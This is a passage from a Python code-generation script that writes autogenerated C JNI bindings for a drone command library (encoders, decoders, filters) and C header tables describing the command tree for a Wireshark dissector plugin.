else:
hasArgOfType[arg.argType] = True
cfile = open (paths.JNI_CFILE, 'w')
JNI_FUNC_PREFIX='Java_' + JNI_PACKAGE_NAME.replace ('.', '_') + '_'
JNI_FIRST_ARGS='JNIEnv *env, jobject thizz'
JNI_FIRST_ARGS_STATIC='JNIEnv *env, jclass clazz'
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <jni.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('\n')
cfile.write ('#define TOSTRING_STRING_SIZE (1024)\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jstring JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeToString (' + JNI_FIRST_ARGS + ', jlong jpdata, jint jdataSize)\n')
cfile.write ('{\n')
cfile.write (' jstring ret = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' char *cstr = calloc (TOSTRING_STRING_SIZE, 1);\n')
cfile.write (' if (cstr == NULL)\n')
cfile.write (' {\n')
cfile.write (' return ret;\n')
cfile.write (' }\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' ((uint8_t *)(intptr_t)jpdata, jdataSize, cstr, TOSTRING_STRING_SIZE);\n')
cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ret = (*env)->NewStringUTF(env, cstr);\n')
cfile.write (' }\n')
cfile.write (' free (cstr);\n')
cfile.write (' return ret;\n')
cfile.write ('}\n')
cfile.write ('JNIEXPORT jstring JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeStaticToString (' + JNI_FIRST_ARGS_STATIC + ', jlong jpdata, jint jdataSize)\n')
cfile.write ('{\n')
cfile.write (' jstring ret = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' char *cstr = calloc (TOSTRING_STRING_SIZE, 1);\n')
cfile.write (' if (cstr == NULL)\n')
cfile.write (' {\n')
cfile.write (' return ret;\n')
cfile.write (' }\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' ((uint8_t *)(intptr_t)jpdata, jdataSize, cstr, TOSTRING_STRING_SIZE);\n')
cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ret = (*env)->NewStringUTF(env, cstr);\n')
cfile.write (' }\n')
cfile.write (' free (cstr);\n')
cfile.write (' return ret;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('/* END OF GENERATED CODE */\n')
cfile.close ()
def cCallbackName (ftr, cmd):
return ARFunctionName (LIB_MODULE, JNI_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'nativeCallback')
def jmethodeCbName (ftr, cmd):
return LIB_MODULE+ '_'+JNI_SUBMODULE+ '_'+get_ftr_old_name(ftr).upper()+ '_'+format_cmd_name(cmd).upper() + '_CB'
cfile = open (paths.JNI_DECODER_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <jni.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('\n')
cfile.write ('typedef struct\n')
cfile.write ('{\n')
cfile.write (' jobject javaDecoder; /**< java decoder */\n')
cfile.write (' ARCOMMANDS_Decoder_t *nativeDecoder; /**< native decoder*/\n')
cfile.write ('} ARCOMMANDS_JNI_Decoder_t;\n')
cfile.write ('\n')
cfile.write ('static JavaVM *g_vm = NULL;\n')
cfile.write ('static jfieldID g_dataSize_id = 0;\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write ('static jmethodID ' +jmethodeCbName(ftr, cmd)+ ';\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write ('JNI_OnLoad (JavaVM *vm, void *reserved)\n')
cfile.write ('{\n')
cfile.write (' g_vm = vm;\n')
cfile.write (' JNIEnv *env = NULL;\n')
cfile.write (' if ((*vm)->GetEnv (vm, (void **)&env, JNI_VERSION_1_6) != JNI_OK)\n')
cfile.write (' {\n')
cfile.write (' return -1;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return JNI_VERSION_1_6;\n')
cfile.write ('}\n')
cfile.write ('JNIEXPORT void JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeStaticInit (' + JNI_FIRST_ARGS_STATIC + ')\n')
cfile.write ('{\n')
cfile.write (' jclass decoder_clazz = (*env)->FindClass (env, "' + JNI_PACKAGE_NAME.replace ('.', '/') + '/' + JNIDecoderClassName + '");\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write (' '+jmethodeCbName(ftr, cmd)+ ' = (*env)->GetMethodID (env, decoder_clazz, "' + javaCbName (ftr, cmd) + '", "(')
for arg in cmd.args:
cfile.write ('' + xmlToJavaSig (ftr, cmd, arg))
cfile.write (')V");\n')
cfile.write ('\n')
cfile.write (' /* cleanup */\n')
cfile.write (' (*env)->DeleteLocalRef (env, decoder_clazz);\n')
cfile.write ('}\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeDecode (' + JNI_FIRST_ARGS + ', jlong jdecoder, jlong jpdata, jint jdataSize)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *) (intptr_t)jdecoder;\n')
cfile.write (' uint8_t *pdata = (uint8_t *) (intptr_t)jpdata;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (decoder->nativeDecoder, pdata, jdataSize);\n')
cfile.write (' return err;\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (' + JNI_FIRST_ARGS + ', jlong c_pdata, jint dataLen')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
for multiset_msg in arg.argType.msgs:
cfile.write (', jint '+multiset_msg.ftr.name+ multiset_msg.name+'IsSet')
for multiset_msg_arg in multiset_msg.args:
cfile.write (', ' + xmlToJni (multiset_msg.ftr, multiset_msg, multiset_msg_arg) + ' ' +multiset_msg.ftr.name+ multiset_msg.name+ multiset_msg_arg.name)
else:
cfile.write (', ' + xmlToJni (ftr, cmd, arg) + ' ' + arg.name)
cfile.write (')\n')
cfile.write ('{\n')
cfile.write (' int32_t c_dataSize = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR') + ';\n');
cfile.write (' if (g_dataSize_id == 0)\n')
cfile.write (' {\n')
cfile.write (' jclass clz = (*env)->GetObjectClass (env, thizz);\n')
cfile.write (' if (clz != 0)\n')
cfile.write (' {\n')
cfile.write (' g_dataSize_id = (*env)->GetFieldID (env, clz, "used", "I");\n')
cfile.write (' (*env)->DeleteLocalRef (env, clz);\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' return err;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' const char *c_' + arg.name + ' = (*env)->GetStringUTFChars (env, ' + arg.name + ', NULL);\n')
elif isinstance(arg.argType, ArMultiSetting):
cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' c_' + arg.name + ' = {\n')
for multiset_msg in arg.argType.msgs:
cfile.write (' .'+multiset_msg.name+'.isSet = '+multiset_msg.ftr.name+ multiset_msg.name+'IsSet,\n')
for multiset_msg_arg in multiset_msg.args:
cfile.write (' .'+multiset_msg.name+'.'+multiset_msg_arg.name+' = ' +multiset_msg.ftr.name+ multiset_msg.name+ multiset_msg_arg.name+',\n')
cfile.write ('};\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' ((uint8_t *) (intptr_t) c_pdata, dataLen, &c_dataSize')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (', c_' + arg.name)
elif isinstance(arg.argType, ArMultiSetting):
cfile.write (', &c_' + arg.name)
else:
cfile.write (', (' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ')' + arg.name)
cfile.write (');\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' (*env)->ReleaseStringUTFChars (env, ' + arg.name + ', c_' + arg.name + ');\n')
cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' (*env)->SetIntField (env, thizz, g_dataSize_id, (jint)c_dataSize);\n')
cfile.write (' }\n')
cfile.write (' return err;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write ('void ' + cCallbackName (ftr, cmd) + ' (')
for arg in cmd.args:
cfile.write (xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name + ', ')
cfile.write ('void *custom)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *)custom;\n')
cfile.write (' jint res;\n')
cfile.write (' JNIEnv *env = NULL;\n')
cfile.write (' res = (*g_vm)->GetEnv (g_vm, (void **)&env, JNI_VERSION_1_6);\n')
cfile.write (' if (res < 0) { return; }\n')
cfile.write ('\n')
for arg in _get_args_multiset(cmd.args):
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE,'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name))+' (decoder->nativeDecoder, '+arg.name+');\n')
for arg in _get_args_without_multiset(cmd.args):
if ArArgType.STRING == arg.argType:
cfile.write (' jstring j_' + arg.name + ' = (*env)->NewStringUTF (env, ' + arg.name + ');\n')
elif isinstance(arg.argType, ArEnum):
cfile.write (' jclass j_' + arg.name + '_class = (*env)->FindClass (env, "' + jniEnumClassName (ftr, cmd, arg) + '");\n')
cfile.write (' jmethodID j_' + arg.name + '_mid = (*env)->GetStaticMethodID (env, j_' + arg.name + '_class, "getFromValue", "(I)' + xmlToJavaSig(ftr, cmd, arg) + '");\n')
cfile.write (' jobject j_' + arg.name + '_enum = (*env)->CallStaticObjectMethod (env, j_' + arg.name + '_class, j_' + arg.name + '_mid, ' + arg.name + ');\n')
if not list(_get_args_multiset(cmd.args)):
cfile.write (' (*env)->CallVoidMethod (env, decoder->javaDecoder, '+jmethodeCbName (ftr, cmd))
for arg in _get_args_without_multiset(cmd.args):
if ArArgType.STRING == arg.argType:
cfile.write (', j_' + arg.name)
elif isinstance(arg.argType, ArEnum):
cfile.write (', j_' + arg.name + '_enum')
else:
cfile.write (', ' + xmlToJniCast(ftr, cmd, arg) + arg.name)
cfile.write (');\n')
for arg in _get_args_without_multiset(cmd.args):
if ArArgType.STRING == arg.argType:
cfile.write (' (*env)->DeleteLocalRef (env, j_' + arg.name + ');\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jlong JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeNewDecoder (' + JNI_FIRST_ARGS + ')\n')
cfile.write ('{\n')
cfile.write (' int failed = 0;\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = calloc(1, sizeof(ARCOMMANDS_JNI_Decoder_t));\n')
cfile.write (' if (decoder == NULL)\n')
cfile.write (' {\n')
cfile.write (' failed = 1;\n')
cfile.write (' }\n')
cfile.write (' \n')
cfile.write (' if (!failed)\n')
cfile.write (' {\n')
cfile.write (' decoder->nativeDecoder = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (NULL);\n')
cfile.write (' if (decoder->nativeDecoder == NULL)\n')
cfile.write (' {\n')
cfile.write (' failed = 1;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' \n')
cfile.write (' if (!failed)\n')
cfile.write (' {\n')
cfile.write (' decoder->javaDecoder = (*env)->NewGlobalRef(env, thizz);\n')
cfile.write (' if (decoder->javaDecoder == NULL)\n')
cfile.write (' {\n')
cfile.write (' failed = 1;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' \n')
cfile.write (' if (!failed)\n')
cfile.write (' {\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (decoder->nativeDecoder, ' + cCallbackName (ftr, cmd) + ', decoder);\n')
cfile.write ('\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if ((failed) && (decoder != NULL))\n')
cfile.write (' {\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (&decoder->nativeDecoder);\n')
cfile.write (' if (decoder->javaDecoder != NULL)\n')
cfile.write (' {\n')
cfile.write (' (*env)->DeleteGlobalRef(env, decoder->javaDecoder);\n')
cfile.write (' }\n')
cfile.write (' free(decoder);\n')
cfile.write (' decoder = NULL;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return (jlong) (intptr_t) decoder;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT void JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeDeleteDecoder (' + JNI_FIRST_ARGS + ', jlong jdecoder)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *) (intptr_t)jdecoder;\n')
cfile.write ('\n')
cfile.write (' if (decoder != NULL)\n')
cfile.write (' {\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (&decoder->nativeDecoder);\n')
cfile.write (' if (decoder->javaDecoder != NULL)\n')
cfile.write (' {\n')
cfile.write (' (*env)->DeleteGlobalRef(env, decoder->javaDecoder);\n')
cfile.write (' }\n')
cfile.write (' free(decoder);\n')
cfile.write (' }\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('/* END OF GENERATED CODE */\n')
cfile.close ()
cfile = open (paths.JNI_FILTER_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n')
cfile.write ('#include <jni.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jlong JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeNewFilter(' + JNI_FIRST_ARGS + ', jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (behavior, NULL);\n')
cfile.write (' return (jlong)(intptr_t)filter;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT void JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeDeleteFilter(' + JNI_FIRST_ARGS + ', jlong cFilter)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&filter);\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeFilterCommand(' + JNI_FIRST_ARGS + ', jlong cFilter, jlong cCommand, jint len)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' uint8_t *command = (uint8_t *)(intptr_t)cCommand;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' status = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (filter, command, len, NULL);\n')
cfile.write (' return (jint)status;\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (filter, behavior);\n')
cfile.write (' return (jint)err;\n')
cfile.write ('}\n')
cfile.write ('\n')
if ftr.classes:#project only
for cl in ftr.classes:
cfile.write (' // - Class ' + cl.name + '\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (filter, behavior);\n')
cfile.write (' return (jint)err;\n')
cfile.write ('}\n')
cfile.write ('\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior (filter, behavior);\n')
cfile.write (' return (jint)err;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('/* END OF GENERATED CODE */\n')
cfile.close ()
# Functions for tree file generation
# (Wireshark Plugin)
def dump_enum_table(ftr, cl, cmd, arg):
table = 'static struct arsdk_enum %s_%s_%s_%s_enum_tab[] = {\n' % (get_ftr_old_name(ftr), cl.name, cmd.name, arg.name)
value = 0
for enum in arg.enums:
comment = enum.doc.replace('\n', '\\n')
table += ' {\n'
table += ' .name = "%s",\n' % enum.name
table += ' .value = %s,\n' % AREnumValue(LIB_MODULE,
get_ftr_old_name(ftr).upper() + '_' +
cl.name.upper(),
cmd.name.upper() + '_' +
arg.name.upper(), enum.name)
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
value += 1
table = table + '};\n'
return table if arg.enums else ''
def dump_arg_table(ftr, cl, cmd):
table = 'static struct arsdk_arg %s_%s_%s_arg_tab[] = {\n' % (get_ftr_old_name(ftr),
cl.name,
cmd.name)
for arg in cmd.args:
comment = get_arg_doc(arg).replace('\n', '\\n')
if len(arg.enums) > 0:
enums = '%s_%s_%s_%s_enum_tab' % (get_ftr_old_name(ftr),
cl.name,
cmd.name,
arg.name)
nenums = 'ARRAY_SIZE(%s)' % enums
else:
enums = 'NULL'
nenums = '0'
table += ' {\n'
table += ' .name = "%s",\n' % arg.name
if isinstance(arg.argType, ArEnum):
table += ' .type = ARSDK_ARG_TYPE_ENUM,\n'
elif isinstance(arg.argType, ArBitfield):
table += ' .type = ARSDK_ARG_TYPE_%s,\n' % ArArgType.TO_STRING[arg.argType.btfType].upper()
else:
table += ' .type = ARSDK_ARG_TYPE_%s,\n' % ArArgType.TO_STRING[arg.argType].upper()
table += ' .enums = %s,\n' % enums
table += ' .nenums = %s,\n' % nenums
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
return table if cmd.args else ''
def dump_cmd_table(ftr, cl):
table = 'static struct arsdk_cmd %s_%s_cmd_tab[] = {\n' % (get_ftr_old_name(ftr),
cl.name)
for cmd in cl.cmds:
comment = cmd.doc.title.replace('\n', '\\n')
if len(cmd.args) > 0:
args = '%s_%s_%s_arg_tab' % (get_ftr_old_name(ftr), cl.name, cmd.name)
nargs = 'ARRAY_SIZE(%s)' % args
else:
args = 'NULL'
nargs = '0'
table += ' {\n'
table += ' .name = "%s",\n' % cmd.name
if cl.name == 'defaultCls':
enum_val = AREnumValue(LIB_MODULE,
ID_SUBMODULE,
get_ftr_old_name(ftr) +
'_CMD', cmd.name)
else:
enum_val = AREnumValue(LIB_MODULE,
ID_SUBMODULE,
get_ftr_old_name(ftr) + '_' + cl.name +
'_CMD', cmd.name)
table += ' .id = %s,\n' % enum_val
# ignore fields, .buf, .timeout, .listtype (are they used at all ?)
table += ' .args = %s,\n' % args
table += ' .nargs = %s,\n' % nargs
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
return table if cl.cmds else ''
def dump_class_table(ftr):
table = 'static struct arsdk_class %s_class_tab[] = {\n' % get_ftr_old_name(ftr)
for cl in ftr.classes:
comment = cl.doc.replace('\n', '\\n')
if len(cl.cmds) > 0:
cmds = get_ftr_old_name(ftr) + '_' + cl.name + '_cmd_tab'
ncmds = 'ARRAY_SIZE(%s)' % cmds
else:
cmds = 'NULL'
ncmds = '0'
table += ' {\n'
table += ' .name = "%s",\n' % cl.name
if cl.name != 'defaultCls':
table += ' .ident = %s,\n' % AREnumValue(LIB_MODULE,
ID_SUBMODULE,
get_ftr_old_name(ftr) + '_CLASS',
cl.name)
else:
table += ' .ident = 0,\n'
table += ' .cmds = %s,\n' % cmds
table += ' .ncmds = %s,\n' % ncmds
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
return table if len(ftr.classes) > 0 else ''
def dump_project_table(projects):
table = 'static struct arsdk_project arsdk_projects[] = {\n'
for proj in projects:
comment = proj.doc.replace('\n', '\\n')
if proj.classes and len(proj.classes) > 0:
classes = get_ftr_old_name(proj) + '_class_tab'
nclasses = 'ARRAY_SIZE(%s)' % classes
else:
classes = 'NULL'
nclasses = '0'
table += ' {\n'
table += ' .name = "%s",\n' % get_ftr_old_name(proj)
table += ' .ident = %s,\n' % AREnumValue(LIB_MODULE,
ID_SUBMODULE,
'FEATURE',
get_ftr_old_name(proj))
table += ' .classes = %s,\n' % classes
table += ' .nclasses = %s,\n' % nclasses
table += ' .comment = "%s"\n' % comment.replace('"', '\\"')
table += ' },\n'
table = table + '};\n'
table += 'static const unsigned int arsdk_nprojects = '
table += 'ARRAY_SIZE(arsdk_projects);\n'
return table if len(projects) > 0 else ''
def dump_tree_header(ctx, filename):
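# Write a standalone C header describing the whole command tree (projects, classes,
# commands, args and enums) as static tables, for use by the Wireshark plugin.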
allFeatures = ctx.features
hfile = open (filename, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY *\n')
hfile.write (' ********************************************/\n')
hfile.write ('\n')
hfile.write ('#define ARRAY_SIZE(_t) (sizeof(_t)/sizeof((_t)[0]))\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief libARCommands Tree dump.\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef _ARSDK_ARCOMMANDS_TREE_H\n')
hfile.write ('#define _ARSDK_ARCOMMANDS_TREE_H\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('#include <stdlib.h>\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write('enum arsdk_arg_type {\n')
hfile.write(' ARSDK_ARG_TYPE_ENUM,\n')
hfile.write(' ARSDK_ARG_TYPE_U8,\n')
hfile.write(' ARSDK_ARG_TYPE_I8,\n')
hfile.write(' ARSDK_ARG_TYPE_U16,\n')
hfile.write(' ARSDK_ARG_TYPE_I16,\n')
hfile.write(' ARSDK_ARG_TYPE_U32,\n')
hfile.write(' ARSDK_ARG_TYPE_I32,\n')
hfile.write(' ARSDK_ARG_TYPE_U64,\n')
hfile.write(' ARSDK_ARG_TYPE_I64,\n')
hfile.write(' ARSDK_ARG_TYPE_FLOAT,\n')
hfile.write(' ARSDK_ARG_TYPE_DOUBLE,\n')
hfile.write(' ARSDK_ARG_TYPE_STRING,\n')
hfile.write('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_enum {\n')
hfile.write (' const char *name;\n')
hfile.write (' unsigned int value;\n')
hfile.write (' const char *comment;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_arg {\n')
hfile.write (' const char *name;\n')
hfile.write (' enum arsdk_arg_type type;\n')
hfile.write (' struct arsdk_enum *enums;\n')
hfile.write (' unsigned int nenums;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_cmd {\n')
hfile.write (' const char *name;\n')
hfile.write (' unsigned int id;\n')
hfile.write (' struct arsdk_arg *args;\n')
hfile.write (' unsigned int nargs;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_class {\n')
hfile.write (' const char *name;\n')
hfile.write (' unsigned int ident;\n')
hfile.write (' struct arsdk_cmd *cmds;\n')
hfile.write (' unsigned int ncmds;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
hfile.write ('struct arsdk_project {\n')
hfile.write (' const char *name;\n')
hfile.write (' eARCOMMANDS_ID_FEATURE ident;\n')
hfile.write (' struct arsdk_class *classes;\n')
hfile.write (' unsigned int nclasses;\n')
hfile.write (' const char *comment;\n')
hfile.write (' void *priv;\n')
hfile.write ('};\n')
hfile.write ('\n')
# walk XML tree and dump C structures
for ftr in allFeatures:
defaultCls = ArClass('defaultCls', 0, '')
for cmd in ftr.cmds + ftr.evts:
cl = defaultCls if cmd.cls is None else cmd.cls
for arg in cmd.args:
hfile.write(dump_enum_table(ftr, cl, cmd, arg))
